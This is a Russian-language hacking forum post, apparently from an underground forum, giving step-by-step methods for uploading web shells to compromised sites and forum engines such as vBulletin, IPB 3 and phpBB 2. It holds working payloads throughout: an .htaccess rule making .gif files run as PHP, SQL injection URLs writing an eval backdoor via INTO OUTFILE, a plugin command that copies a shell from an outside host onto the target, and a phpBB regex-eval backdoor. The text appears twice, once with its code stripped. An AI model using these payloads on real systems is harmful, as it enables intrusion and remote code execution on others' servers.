Friend
Professional
- Messages
- 2,653
- Reaction score
- 850
- Points
- 113
Сегодня я расскажу как заливать шеллы из простых самописных админок так и из формумных движков н-р : vBulletin , IPB, phpBB 2,3
Intro.
Оболочка операционной системы (от англ. shell — оболочка) — интерпретатор команд операционной системы (ОС), обеспечивающий интерфейс для взаимодействия пользователя с функциями системы.
Start.
Рассмотрим следующую ситуация , вы взломали сайт с самописной админкой ... и не можете залит веб-шелл , но там присутствует заливка картинок и загружает только форматы ,jpg ,gif ,png.
Что в этом случаем можно сделать ?
1. Пихаем шелл с расширением .gif в какую нибудь папку с картинками, и создаем файл .htaccess с содержимым
2. Способ заливки шелла через mysql.user из скули
1.Узнаем из под кого мы сидим и узнаем так же его права к mysql.
н-р :
(Узнаем под кем мы сидим)
2.
(Проверим привилегии нашего юзера. Если выдаёт ошибку при выводе, можно похексить нашего юзера 0x)
3.
(Заливаем мини-шелл)
P.S
Что бы всё получилось нужно имееть права на запись и знать полный путь до корня.
Так же проверить права на запись можно так :
Если мы вывели phpinfo() то считайте шелл у нас в руках
Далее в phpinfo ищит полный путь до форума /home/u0000/site.ru/www/sell.php , вот пример полного пути . Далее
нам нужно наш веб-шелл превратить в txt файл , и залить на любой сайт н-р mysite.com/shell.txt
Шелл заливаем командой
Что она делает ? она копирует содержимое переменной [a] в переменную , то есть shell.txt копирует в shell.php
4. Заливаем шелл в IPB 3
Заходим:
Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос
полный путь можно посмотреть так:
->Поддержка, там будет сверху написана версия PHP и слева ссылка на PHP INFO
Шелл тут:
5. Заливаем шелл в phpBB 2
1. Создаём файл ex.sql
2. Прописываем туда
Где user_id=2 - идентификатор администратора
3. Заходим в админ-панель
4. В админ-панеле выбираем пункт "Восстановить БД" и загружаем ex.sql
5. Выполняем код / Заливаем шелл так
Заходим:
После:
Что бы вывести phpinfo() нужно быть авторизованым.
End.
В этой статье я поверхностно показал как заливать шелл в самописные админки с помощью htaccess и в популярные форумные движки. Спасибо за чтение
Веб-шелл от oRb WSO2.4 - hXXps://forum.antichat.ru/thread103155-WSO.html
Intro.
Оболочка операционной системы (от англ. shell — оболочка) — интерпретатор команд операционной системы (ОС), обеспечивающий интерфейс для взаимодействия пользователя с функциями системы.
Start.
Рассмотрим следующую ситуация , вы взломали сайт с самописной админкой ... и не можете залит веб-шелл , но там присутствует заливка картинок и загружает только форматы ,jpg ,gif ,png.
Что в этом случаем можно сделать ?
1. Пихаем шелл с расширением .gif в какую нибудь папку с картинками, и создаем файл .htaccess с содержимым
Code:
AddType application/x-httpd-php .gif
Данная команда выполнит формат .gif как php
Пробуем открыть [path]/shell.gif2. Способ заливки шелла через mysql.user из скули
1.Узнаем из под кого мы сидим и узнаем так же его права к mysql.
н-р :
Code:
site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+--+2.
Code:
site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user='наш юзер'+--+3.
Code:
site.com/index.php?id=-1+union+select+1,'<?php eval($_REQUEST[cmd]); ?>',3+from+mysql.user+into+outfile+'Путь до файла'--+1P.S
Что бы всё получилось нужно имееть права на запись и знать полный путь до корня.
Так же проверить права на запись можно так :
Code:
site.com/index.php?id=1+and+1=0+union+Select+1,'prava',3+from+mysql.user+--+
Если prava отобразится , то права есть.
3. Следующая ситуация. Мы в админке форумного движка vBulletin
Заходим:
Plugins & Products -> Plugin Manager -> [Add New Plugin]
Плагины & Продукты -> Менеджер плагинов -> [Добавить новый плагин]
Выбираем темптлей . Обычно выбирают faq_complete , выбираем и жмем галочку Plugin is Active выставляем "Yes" и сохраняем.
Далее выводим phpinfo()
[CODE]
localhost/forum/faq.php?cmd=phpinfo();Далее в phpinfo ищит полный путь до форума /home/u0000/site.ru/www/sell.php , вот пример полного пути . Далее
нам нужно наш веб-шелл превратить в txt файл , и залить на любой сайт н-р mysite.com/shell.txt
Шелл заливаем командой
Code:
localhost/forum/faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php4. Заливаем шелл в IPB 3
Заходим:
Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос
Code:
select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'->Поддержка, там будет сверху написана версия PHP и слева ссылка на PHP INFO
Шелл тут:
Code:
http://site.com/uploads/shell.php1. Создаём файл ex.sql
2. Прописываем туда
Code:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_GET[e]));' WHERE user_id=2;3. Заходим в админ-панель
4. В админ-панеле выбираем пункт "Восстановить БД" и загружаем ex.sql
5. Выполняем код / Заливаем шелл так
Заходим:
Code:
http://target/profile.php?mode=editprofile&e=phpinfo();
Code:
http://target/profile.php?mode=editprofile&e=faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.phpEnd.
В этой статье я поверхностно показал как заливать шелл в самописные админки с помощью htaccess и в популярные форумные движки. Спасибо за чтение
Веб-шелл от oRb WSO2.4 - hXXps://forum.antichat.ru/thread103155-WSO.html
